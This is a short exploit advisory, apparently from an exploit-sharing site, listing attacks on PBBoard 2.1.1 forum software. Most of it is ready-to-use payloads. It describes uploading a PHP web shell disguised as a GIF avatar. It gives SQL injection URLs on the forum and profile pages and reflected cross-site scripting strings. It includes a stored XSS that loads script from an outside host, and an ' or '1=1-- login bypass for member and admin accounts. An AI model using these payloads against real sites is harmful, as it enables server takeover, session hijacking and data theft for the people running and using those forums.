扫码分享
验证:
体验盒子==================================================
PBBoard 2.1.1 Multiple Remote Vulnerabilities
==================================================
|=-----------------------------------------------------=|
|=-------------=[JIKO |No-exploit.Com|]=-----------=|
|=-----------------------------------------------------=|
[~]-----------|00|
NAme:JIKO (JAWAD)
Home:No-exploit.Com
Mail: !x!
[~]-----------|01|
-{Script}
name :PBBoard_v2.1.1
link :http://www.pbboard.com/PBBoard_v2.1.1.zip
[~]-----------|02|
-{3xpl01t}
upload Shell and file .exe ....etc :(
http://localhost/ara/index.php?page=usercp&control=1&avatar=1&main=1
select From my Pc
and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img
sql & xss
all script is infected :(
inser '( in all % variable in the script
SQl :/index.php?page=forum&show=1&id=2'a
Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>
SQl :/index.php?page=profile&show=1&username=jawad'
SQl :/index.php?page=profile&show=1&username=jawad' and id='1
Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>
........etc
Xss In Profil
Url :/index.php?page=usercp&control=1&avatar=1&main=1
Select img From Url
http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif
Login :(
User : real name of admin or member you want | jawad' or '1=1--
Pass : jiko
for admin panel
Url: /admin.php
User : jawad' or '1=1--
Pass : jiko
:((..Etc exploit
[~]-----------|03|
-{Greetz}
All my friends
|No-Exploit.com Members
-------------------------------------
体验盒子
